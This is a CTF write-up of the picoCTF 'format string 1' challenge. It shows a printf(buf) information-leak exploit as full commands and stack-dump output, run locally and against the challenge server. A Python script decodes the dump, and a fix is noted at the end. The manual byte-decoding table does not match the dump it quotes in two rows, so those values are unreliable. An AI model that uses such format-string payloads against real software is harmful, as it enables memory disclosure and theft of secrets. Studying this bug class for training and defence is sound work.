format string 1

Overview

100 points

Category: Binary Exploitation

Tags: #binaryexploitation #formatstring #infoleak

Description

Patrick and Sponge Bob were really happy with those orders you made for them, but now they're curious about the secret menu. Find it, and along the way, maybe you'll find something else of interest!

Approach

Inspecting the provided source code, 'format-string-1.c', we can see that three files must be present for the program to run to completion; otherwise it terminates early.

The buffers these files are read into are declared in main() as follows:

char buf[1024];
char secret1[64];
char flag[64];
char secret2[64];

To test locally we must create a dummy flag file:

$ echo "dummyflag{1234}" > flag.txt

Create the secret menu item files with readily identifiable data that fills the associated buffers (secret1 and secret2), so that they can be located in memory:

$ echo $(python3 -c 'print("A" * 64)') > secret-menu-item-1.txt
$ echo $(python3 -c 'print("B" * 64)') > secret-menu-item-2.txt

A quick check of the provided challenge binary format-string-1 shows that it is a 64-bit executable:

$ file format-string-1
format-string-1: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=62bc37ea6fa41f79dc756cc63ece93d8c5499e89, for GNU/Linux 3.2.0, not stripped

Further analysis of the source code shows that a string of up to 1024 characters is read from standard input into buf using scanf(), and that the buffer is then passed directly to printf() as the format string, with no format specifier of its own.

...
scanf("%1024s", buf);
printf("Here's your order: ");
printf(buf);
...

We use a typical format string attack to leak information from the stack, relying on our known input data to locate the secret1 and secret2 buffers that surround the target flag buffer. This is done by supplying as user input a format string that prints a long series of sequential hexadecimal values (in this case 50), with a little formatting to pad and separate the values for simpler visual inspection, effectively dumping a region of the stack. In a normal printf() call the arguments matching the format specifiers are passed as part of the call (on x86-64 the first few in registers, the remainder on the stack); here no such arguments exist, so printf() consumes whatever happens to sit in the respective argument locations and displays it, hence the info leak.

$ echo $(python3 -c 'print("%016llx." * 50)') | ./format-string-1 
Give me your order and I'll read it back to you:
Here's your order: 0000000000402118.0000000000000000.000079dfbe816a00.0000000000000000.00000000007b0c80.4242424242424242.4242424242424242.4242424242424242.4242424242424242.4242424242424242.4242424242424242.4242424242424242.0042424242424242.616c66796d6d7564.0a7d343332317b67.0000000000000000.000079dfbe8b5160.000079dfbe8b5b10.000079dfbe8b5160.00000001be8b78d8.000079dfbe8b54d0.4141414141414141.4141414141414141.4141414141414141.4141414141414141.4141414141414141.4141414141414141.4141414141414141.0041414141414141.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.
Bye!

Knowing that secret1 is filled with A characters (0x41) and secret2 with B characters (0x42), we can quickly locate both buffers in the stack dump above.

Between these buffers is our flag buffer, the start of which can be seen at the 14th 64-bit word of the dumped stack.

For verification we can compare the hexadecimal representation of our dummy flag file with the contents of the extracted flag buffer, remembering to be mindful of endianness in the comparison.

$ hd flag.txt 
00000000  64 75 6d 6d 79 66 6c 61  67 7b 31 32 33 34 7d 0a  |dummyflag{1234}.|

Solution

Repeating the above attack against the picoCTF challenge server to dump the real flag file contents, we get the following output:

$ echo $(python3 -c 'print("%016llx." * 50)') | nc mimas.picoctf.net 56961
Give me your order and I'll read it back to you:
Here's your order: 0000000000402118.0000000000000000.00007b3c0fb03a00.0000000000000000.0000000000abb880.000000000a347834.00007ffd9692ca70.00007b3c0f8f4e60.00007b3c0fb194d0.0000000000000001.00007ffd9692cb40.0000000000000000.0000000000000000.7b4654436f636970.355f31346d316e34.3478345f33317937.34365f673431665f.007d363131373732.0000000000000007.00007b3c0fb1b8d8.0000002300000007.206e693374307250.00000a336c797453.0000000000000009.00007b3c0fb2cde9.00007b3c0f8fd098.00007b3c0fb194d0.0000000000000000.00007ffd9692cb50.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.2e786c6c36313025.
Bye!

Manually extracting the 64 bytes (8 64-bit words) starting at the 14th word of the dumped stack data:

{ 7b4654436f636970.355f31346d316e34.3478345f33317937.34365f673431665f.007d363131373732.0000000000000007.00007b3c0fb1b8d8.0000002300000007 }

Converting each byte of these words to ASCII characters, we can see evidence of our flag:

0x7b4654436f636970 = 7b.46.54.43.6f.63.69.70 = {FTCocip.
0x355f31346d316e34 = 35.5f.31.34.6d.31.6e.34 = 5_14m1n4
0x3478345f33317937 = 34.78.34.5f.33.31.79.37 = 4x4_31y7
0x30355f673431665f = 30.35.5f.67.34.31.66.5f = 05_g41f_
0x007d343663363933 = 00.7d.34.36.63.36.39.33 =  }46c693

After some minor reconstruction of the string from the dumped little-endian words (reversing the byte order within each 8-byte word), we have our flag:

picoCTF{...........redacted.............}

The actual flag value has been redacted for the purposes of this write-up.
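As an added example (not part of the original write-up), the following Python script automates the two manual steps above: locating the marker buffers (secret1 filled with 0x41, secret2 with 0x42) in the dumped words, and reconstructing the little-endian words that lie between them. The sample input is the local stack dump from the write-up, embedded as a constructed string, and the result is checked against the hd output of the dummy flag file; the remote dump is deliberately not decoded here since the real flag is redacted.

```python
"""Reconstruct bytes from a printf("%016llx.") stack dump.

Added example for this write-up, not the challenge's own code. It parses the
dumped 64-bit words, finds the contiguous runs of marker words produced by the
A-filled and B-filled secret files, and decodes the words between those runs
as little-endian memory (x86-64), stopping at the first NUL byte.
"""
import struct

# Constructed sample: the local dump from the write-up, trimmed to the first 32
# words (5 leading values, secret2 = B*64, the 64-byte flag buffer, secret1 = A*64,
# then the start of our own "%016llx." payload echoed back from buf).
SAMPLE_DUMP = (
    "Here's your order: "
    "0000000000402118.0000000000000000.000079dfbe816a00.0000000000000000."
    "00000000007b0c80."
    + "4242424242424242." * 7 + "0042424242424242."
    + "616c66796d6d7564.0a7d343332317b67.0000000000000000.000079dfbe8b5160."
    "000079dfbe8b5b10.000079dfbe8b5160.00000001be8b78d8.000079dfbe8b54d0."
    + "4141414141414141." * 7 + "0041414141414141."
    + "2e786c6c36313025." * 3
)


def parse_words(dump_line: str) -> list[int]:
    """Return the 64-bit values printed by '%016llx.' in order of appearance."""
    payload = dump_line.split("Here's your order: ", 1)[-1]
    return [int(tok, 16) for tok in payload.split(".") if len(tok) == 16]


def word_to_bytes(word: int) -> bytes:
    """Little-endian: the lowest byte of the printed word is first in memory."""
    return struct.pack("<Q", word)


def describe_word(word: int) -> str:
    """One row in the style of the write-up's table, but in memory byte order."""
    bs = word_to_bytes(word)
    hex_bytes = " ".join(f"{b:02x}" for b in bs)
    printable = "".join(chr(b) if 32 <= b < 127 else "." for b in bs)
    return f"0x{word:016x} = {hex_bytes} = {printable!r}"


def is_marker_word(word: int, marker: int) -> bool:
    """True if every non-NUL byte equals the marker byte.

    The last word of a 64-byte buffer may carry a terminating NUL in its top
    byte (e.g. 0x0042424242424242), so NULs are tolerated but an all-zero word
    is not a marker.
    """
    bs = word_to_bytes(word)
    return any(bs) and all(b in (marker, 0) for b in bs)


def find_marker_run(words: list[int], marker: int):
    """Return (first, last) indices of the longest contiguous run of marker words."""
    best = None
    start = None
    for i in range(len(words) + 1):  # one extra step flushes a trailing run
        in_run = i < len(words) and is_marker_word(words[i], marker)
        if in_run and start is None:
            start = i
        elif not in_run and start is not None:
            if best is None or (i - start) > (best[1] - best[0] + 1):
                best = (start, i - 1)
            start = None
    return best


def decode_between(words: list[int], lo_run, hi_run) -> bytes:
    """Bytes of the words strictly between two marker runs, cut at the first NUL."""
    first, stop = lo_run[1] + 1, hi_run[0]
    raw = b"".join(word_to_bytes(w) for w in words[first:stop])
    return raw.split(b"\x00", 1)[0]


def recover_between_markers(dump_line: str, marker_a: int = 0x41,
                            marker_b: int = 0x42) -> bytes:
    """Locate both marker buffers and decode whatever sits between them."""
    words = parse_words(dump_line)
    run_a = find_marker_run(words, marker_a)
    run_b = find_marker_run(words, marker_b)
    if run_a is None or run_b is None:
        raise ValueError("marker buffers not found in dump")
    lo, hi = sorted([run_a, run_b])
    return decode_between(words, lo, hi)


if __name__ == "__main__":
    words = parse_words(SAMPLE_DUMP)
    for w in words[13:15]:           # the 14th and 15th words hold the dummy flag
        print(describe_word(w))
    print(recover_between_markers(SAMPLE_DUMP))
```

The decoded bytes equal the hd output of flag.txt in the write-up (64 75 6d 6d 79 66 6c 61 67 7b 31 32 33 34 7d 0a), confirming the byte-order reasoning. From the defensive side, the underlying defect is that user data is used as the format argument; printf("%s", buf) or fputs(buf, stdout) never interprets the input, and compiling with -Wformat-security flags the non-literal format string.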